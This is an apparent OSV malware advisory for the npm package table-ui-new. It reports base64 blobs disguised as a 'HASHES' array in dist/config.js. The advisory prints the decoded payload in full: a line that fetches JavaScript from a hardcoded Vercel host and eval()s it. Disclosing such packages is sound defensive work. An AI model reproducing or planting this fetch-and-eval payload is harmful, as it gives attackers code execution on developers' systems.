table-ui-new@2.7.5
Vulnerability report · Last retrieved from osv.dev October 8, 2026 at 6:41 AM UTC
OSV ID
MAL-2026-12473
Ecosystem
npm
Summary
table-ui-new@2.7.4 ships dist/config.js, exposed via the package.json ./config subpath export, which exports a module-level array named HASHES containing four base64-encoded strings. Each string decodes to an IIFE of the form (async () => eval(await fetch('https://everydaynodechecker-39147n.vercel.app/api/key?mem=root[0-3]').then(r => r.text())))(); — an unconditional fetch of remote text from a hardcoded external Vercel host followed by eval() of the response. The misleading variable name HASHES disguises executable payloads as inert hash data. The main entry (dist/index.js) is a React hooks module and does not itself invoke these blobs, but the payloads are staged behind a public package export, and any consumer that imports table-ui-new/config receives the array of ready-to-eval remote-fetch IIFEs. The destination host is unrelated to the package's stated purpose (a React table UI library) and returns attacker-controlled JavaScript that would execute in the consumer's Node process with full host privileges.
Source: amazon-inspector (b0b953969edf8d77d5a1be0aa33b4044b38e2352f81c54b0f343f21a1c52c13a)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.